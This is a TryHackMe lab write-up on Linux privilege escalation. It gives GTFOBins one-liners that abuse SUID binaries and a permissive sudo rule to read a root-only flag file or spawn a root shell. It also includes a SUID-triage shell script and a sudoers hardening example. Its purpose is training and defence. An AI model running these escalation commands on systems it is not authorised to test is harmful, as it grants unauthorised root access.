Follow along with this writeup! https://tryhackme.com/room/privescplayground
Hello there, I'm Deskel. This is my first write-up on the THM blog. Today, we are going to explore different ways we can escalate our privileges on a Linux Machine. The creator of the room, SherlockSec, mentioned there are tons of ways to privesc the machine and we're going to explore just a few of them.
Just a small tip: I refer to GTFOBins (https://gtfobins.github.io/) a lot in this challenge. The site lists binaries that can be abused to escape a restricted shell, read or write files, or spawn a root shell when they carry the SUID bit or appear in a sudo rule. I break the write-up into two major sections, SUID and sudo. Without further ado, let's get started!
Click on the link above and deploy the machine, so you can follow along!
Part 1: SUID
SUID exploitation is quite common on Linux, especially when administrators set the SUID bit on binaries in /bin, /usr/bin or /sbin that were never designed to run with elevated privileges.
If you want to know more about SUID exploitation, you can refer to this article. In short, the SUID bit makes a binary run with the privileges of the file's owner rather than the user who launched it. For example, the passwd binary (which changes your password) is owned by root and SUID, because it has to write the new password hash into /etc/shadow, a file ordinary users cannot modify. A root-owned SUID binary that lets you pick which file it reads, writes or executes is therefore a direct path to root.
To quickly search for SUID files on the system, simply use the following command:
$ find / -perm /4000 2>/dev/null
-perm /4000 matches every file that has the SUID bit (octal 4000) set, whatever its other permission bits are. Note the leading slash: plain -perm 4000 would only match files whose mode is exactly 4000 and would miss the usual 4755 binaries (-perm -4000 also works, and is equivalent for a single bit). 2>/dev/null sends the 'permission denied' errors to /dev/null, a black hole, so the list stays readable; adding -type f skips directories, where the bit has a different meaning. Alternatively, you can use the symbolic form of the same test:
$ find / -perm /u=s 2>/dev/null
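The raw find output usually mixes the SUID binaries every install ships with (passwd, sudo, mount, ...) with the odd ones worth attacking. The helper below, an added example that is not part of the original write-up or the room, triages that output before you go to GTFOBins. It reads lines of the form "mode owner path" (as produced by find with -printf '%m %u %p\n'), and classifies each root-owned file as baseline, gtfobins or unknown. Both lists are assumptions for illustration: the baseline is a typical Debian/Ubuntu set, not a universal one, and the GTFOBins names are just the twelve binaries demonstrated in this write-up. The sample input at the bottom is constructed so the script runs offline.

```shell
#!/bin/sh
# Added example (not from the original write-up): triage SUID find output.
# Intended input, one file per line:
#   find / -perm -4000 -type f -printf '%m %u %p\n' 2>/dev/null
#
# Both lists are assumptions for illustration only.
BASELINE="passwd sudo su mount umount chsh chfn gpasswd newgrp pkexec"
GTFO_SUID="arp cut base64 tail ul shuf php5 file tclsh env diff strace"

# in_list NAME LIST: succeed if NAME is one of the words in LIST.
in_list() {
  for _w in $2; do
    [ "$_w" = "$1" ] && return 0
  done
  return 1
}

# Read "mode owner path" lines on stdin and print "<class> <path>".
# Only root-owned SUID files give root; anything else is tagged other-owner
# so it is not mistaken for a root privesc candidate.
triage_suid() {
  while read -r mode owner path; do
    name=${path##*/}
    if [ "$owner" != root ]; then
      cls=other-owner
    elif in_list "$name" "$GTFO_SUID"; then
      cls=gtfobins          # documented shell escape / file read on GTFOBins
    elif in_list "$name" "$BASELINE"; then
      cls=baseline          # expected on a stock install; low priority
    else
      cls=unknown           # custom or third-party SUID binary: investigate
    fi
    printf '%s %s\n' "$cls" "$path"
  done
}

# Paths to try first: known GTFOBins entries and anything non-standard.
worth_trying() {
  triage_suid | awk '$1 == "gtfobins" || $1 == "unknown" { print $2 }'
}

# Constructed sample of find output (not taken from the room's machine).
SAMPLE='4755 root /usr/bin/passwd
4755 root /usr/bin/env
4755 root /usr/sbin/arp
4755 root /usr/local/bin/backup
4755 bob /home/bob/tool'

printf '%s\n' "$SAMPLE" | triage_suid
```

On a real target you would replace the SAMPLE pipe with the find command from the comment; the script never runs find itself, so it is safe to test anywhere. Treat "unknown" as seriously as "gtfobins": a hand-written backup or maintenance binary with the SUID bit is exactly the misconfiguration this room is about, and GTFOBins will not have an entry for it.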
Many programs can be abused once they carry the SUID bit. Always check the SUID section of GTFOBins, which maintains the list of binaries that can be exploited this way.
For this write-up, I'm going to demonstrate twelve SUID exploitations and you can figure out the rest using GTFOBins. Feel free to deploy the machine on TryHackMe and practise yourself!
The demonstrations below either read /root/flag.txt, a file only root can read, or spawn a shell as root. Reading a root-only file proves the escalation (and is often enough to grab the flag), but only the shell-spawning entries (php5, tclsh, env and strace) give you a full root shell. One caveat for the shell-spawning ones: bash drops its effective UID when it differs from the real UID, so if /bin/sh on the target is bash rather than dash, add -p to the shell's arguments (as GTFOBins does) or the shell will come back as your own user.
SUID 1: arp
$ /usr/sbin/arp -v -f /root/flag.txt
SUID 2: cut
$ /usr/bin/cut -d "" -f1 /root/flag.txt
SUID 3: base64
$ /usr/bin/base64 /root/flag.txt | base64 --decode
SUID 4: tail
$ /usr/bin/tail /root/flag.txt
Plain tail prints the last ten lines, which is plenty for a one-line flag; for a longer file, GTFOBins uses a large -c value so the whole file is dumped.
SUID 5: ul
$ /usr/bin/ul /root/flag.txt
SUID 6: shuf
Instead of reading the flag file like the previous SUID binaries, shuf is used to overwrite a file: with -e it takes its input lines from the command-line arguments and with -o it writes the (shuffled) result to the file you name, as root. This is useful for rewriting a root-owned configuration file that a lower-privileged user cannot otherwise touch. Note that -o replaces the file's contents rather than appending, and the line order is shuffled, so it works best for single-line payloads.
SUID 7: php5
$ /usr/bin/php5 -r "pcntl_exec('/bin/sh');"
SUID 8: file
$ /usr/bin/file -m /root/flag.txt
SUID 9: tclsh
Running the SUID tclsh drops you into a Tcl prompt (%) that is already running as root; from there, exec runs any command with those privileges:
% exec cat /root/flag.txt
SUID 10: env
$ /usr/bin/env /bin/sh
SUID 11: diff
$ /usr/bin/diff --line-format=%L /dev/null /root/flag.txt
SUID 12: strace
$ /usr/bin/strace -o /dev/null /bin/sh
Part 2: Sudo
Another privilege escalation method is seeing which commands you can run as root (administrators often allow users to run certain commands as root). Those rules live in /etc/sudoers and the files under /etc/sudoers.d, which administrators edit with visudo; as a low-privileged user you normally cannot read them, so ask sudo directly instead.
To check what commands you can run as root, simply punch in the following line.
$ sudo -l
The screenshot above (the output of sudo -l) shows all the commands you can run as the root user without being asked for a password. We can see this from the (root) NOPASSWD, followed by the binaries we can run.
A rule this permissive, (root) NOPASSWD: ALL, is rare in real life: the lower-privileged user can literally run anything as root, so any command gives a root shell. More often you get a restricted list of binaries; check those against the sudo section of GTFOBins, since many common utilities still allow a shell escape or an arbitrary file read or write even when they are the only thing sudo permits.
$ sudo /bin/bash
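For the administrator's side of this, here is an added sudoers fragment (not a file from the room, and written for a hypothetical user alice) showing the rule that produces a (root) NOPASSWD: ALL line in sudo -l, a "restricted" rule that is no better because the listed binaries have GTFOBins sudo entries, and a rule pinned to one fixed command line:

```sudoers
# Added example, not taken from the room. User "alice" is hypothetical.

# Weak: this is what "(root) NOPASSWD: ALL" in `sudo -l` comes from.
# Any command, as root, no password: `sudo /bin/bash` is a root shell.
alice ALL=(root) NOPASSWD: ALL

# Still weak: both binaries have GTFOBins sudo entries (find can -exec a
# shell, vim can run commands), so this is a root shell with extra steps.
alice ALL=(root) NOPASSWD: /usr/bin/find, /usr/bin/vim

# Tighter: one binary with its arguments fixed, password still required.
# sudo matches the whole command line, so alice cannot add or change
# arguments, and there is no shell-escape in "systemctl restart".
alice ALL=(root) /usr/bin/systemctl restart nginx.service
```

Two checks go with this: visudo -c validates the syntax of /etc/sudoers and /etc/sudoers.d without applying anything, and sudo -l -U alice (run as root) shows exactly what alice will see from her own sudo -l. When reviewing a restricted rule, look up every listed binary on GTFOBins and treat wildcards or open-ended arguments in the rule as equivalent to ALL.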
That's all for the quick write-up on the privesc playground. GTFOBins is definitely a useful site to check for privilege escalation through both SUID binaries and sudo rules. One more thing: check out mzfr's GTFOBins tool, he did a great job on making the site searchable from the terminal.
Hope you enjoyed reading and learnt something new! Until next time :)